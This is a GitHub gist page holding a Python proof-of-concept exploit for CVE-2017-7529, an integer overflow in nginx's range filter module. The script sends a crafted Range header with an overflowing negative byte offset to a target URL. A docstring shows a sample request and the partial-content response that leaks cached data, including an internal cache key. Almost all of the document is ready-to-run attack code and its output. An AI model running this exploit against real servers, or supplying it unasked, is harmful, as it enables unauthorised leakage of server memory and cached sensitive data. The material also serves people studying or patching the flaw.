Skip to content

Instantly share code, notes, and snippets.

@andripwn
Created April 20, 2020 16:53
Show Gist options
  • Save andripwn/fd37a90c3fc7e2d33deb454da87a9a12 to your computer and use it in GitHub Desktop.
Save andripwn/fd37a90c3fc7e2d33deb454da87a9a12 to your computer and use it in GitHub Desktop.
Remote Integer Overflow Vulnerability #15
Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
#!/usr/bin/python
# -*- coding:utf-8 -*-
# Nginx - Remote Integer Overflow Vulnerability
# CVE-2017-7529
import requests
import logging
import sys
logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)
def send_http_request(url, headers={}, timeout=8.0):
httpResponse = requests.get(url, headers=headers, timeout=timeout)
httpHeaders = httpResponse.headers
log.info("status: %s: Server: %s", httpResponse.status_code, httpHeaders.get('Server', ''))
return httpResponse
def exploit(url):
log.info("target: %s", url)
httpResponse = send_http_request(url)
content_length = httpResponse.headers.get('Content-Length', 0)
bytes_length = int(content_length) + 623
content_length = "bytes=-%d,-9223372036854%d" % (bytes_length, 776000 - bytes_length)
httpResponse = send_http_request(url, headers={ 'Range': content_length })
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
log.info("[+] Vulnerable to CVE-2017-7529")
else:
log.info("[?] Unknown Vulnerable")
if __name__ == '__main__':
if len(sys.argv) != 2:
print("[*] %s <url>" % sys.argv[0])
sys.exit(1)
url = sys.argv[1]
exploit(url)
"""
GET /proxy/demo.png HTTP/1.1
Accept-Encoding: identity
Range: bytes=-17208,-9223372036854758792
Host: 127.0.0.1:8000
Connection: close
User-Agent: Python-urllib/2.7
HTTP/1.1 206 Partial Content
Server: nginx/1.13.1
Date: Mon, 14 Aug 2017 05:53:54 GMT
Content-Type: multipart/byteranges; boundary=00000000000000000002
Connection: close
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
X-Proxy-Cache: HIT
--00000000000000000002
Content-Type: image/png
Content-Range: bytes -623-16584/16585
.......<.Y......................lY....r:.Y.....@.`..v.q.."40c9-5547a060fdf00".................................................................................................................................................................................................................................................................
KEY: httpGET127.0.0.1/proxy/demo.png
HTTP/1.1 200 OK
Date: Mon, 14 Aug 2017 05:51:46 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
Accept-Ranges: bytes
Content-Length: 16585
Connection: close
Content-Type: image/png
"""
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment